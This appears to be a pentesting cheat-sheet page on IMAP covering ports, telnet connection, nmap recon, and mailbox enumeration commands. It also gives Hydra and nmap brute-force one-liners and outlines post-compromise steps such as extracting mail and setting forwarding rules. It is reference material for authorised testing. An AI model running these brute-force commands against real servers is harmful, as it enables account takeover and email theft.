IMAP (Internet Message Access Protocol)

Default Ports: 143, 993

IMAP (Internet Message Access Protocol) is a protocol used by email clients to retrieve messages from a mail server over a TCP/IP connection. Unlike POP3, which downloads messages to the client device, IMAP allows users to view and manipulate messages without downloading them, providing more flexibility and functionality.

IMAP operates on a client-server model, where the email client connects to the server and interacts with it to manage email messages.

Connect

Connect Using Telnet

You can connect to an IMAP server using Telnet by following these steps:

Open a terminal window.
Type the following command:

telnet <server-ip> <port>

Once connected, you can interact with the IMAP server by typing commands directly into the Telnet session.

Connect Using Email Clients

Popular email clients like Outlook, Thunderbird, and Apple Mail support IMAP for retrieving email messages. To connect to an IMAP server using an email client, you typically need to provide the server address, port number, username, and password.

Recon

Identifying an IMAP Server

You can use Nmap to scan for open IMAP ports on a target host:

nmap -p 143,993 <target-ip>

You can use Telnet to connect to the IMAP server and observe the banner message to determine the server software and version:

telnet <server-ip> <port>

Enumeration

Enumerating Mailboxes

Once connected to the IMAP server, you can list available mailboxes using the LIST command:

LIST "" *

Enumerating Email Headers

You can retrieve email headers from a specific mailbox using the FETCH command:

FETCH 1 BODY[HEADER.FIELDS (FROM TO SUBJECT DATE)]

Attack Vectors

Brute Force Attacks

Brute force attacks can be attempted against IMAP servers to guess usernames and passwords. Tools like Hydra and Nmap can be used for this purpose.

Hydra Example

hydra -L users.txt -P passwords.txt imap://<server-ip>

Nmap Example

nmap --script imap-brute -p 143,993 <target-ip>

IMAP Injection

IMAP injection attacks involve injecting malicious commands or data into IMAP requests to exploit vulnerabilities in the server software or gain unauthorized access to email accounts.

Man-in-the-Middle (MitM) Attacks

MitM attacks on IMAP traffic can intercept and modify email messages exchanged between the client and server, compromising the confidentiality and integrity of email communication.

Post-Exploitation

Email Extraction

After gaining access to an email account via IMAP, attackers can extract sensitive information such as passwords, financial data, or confidential documents from the compromised mailbox.

Email Manipulation

Attackers can manipulate email messages in various ways, including deleting, forwarding, or modifying existing messages, to achieve their objectives.

Email Forwarding

Attackers can set up email forwarding rules to automatically forward incoming messages from the compromised account to an external email address controlled by them, allowing them to monitor communications and steal sensitive information.

IMAP (Internet Message Access Protocol)

Connect​

Connect Using Telnet​

Connect Using Email Clients​

Recon​

Identifying an IMAP Server​

Banner Grabbing​

Enumeration​

Enumerating Mailboxes​

Enumerating Email Headers​

Attack Vectors​

Brute Force Attacks​

Hydra Example​

Nmap Example​

IMAP Injection​

Man-in-the-Middle (MitM) Attacks​

Post-Exploitation​

Email Extraction​

Email Manipulation​

Email Forwarding​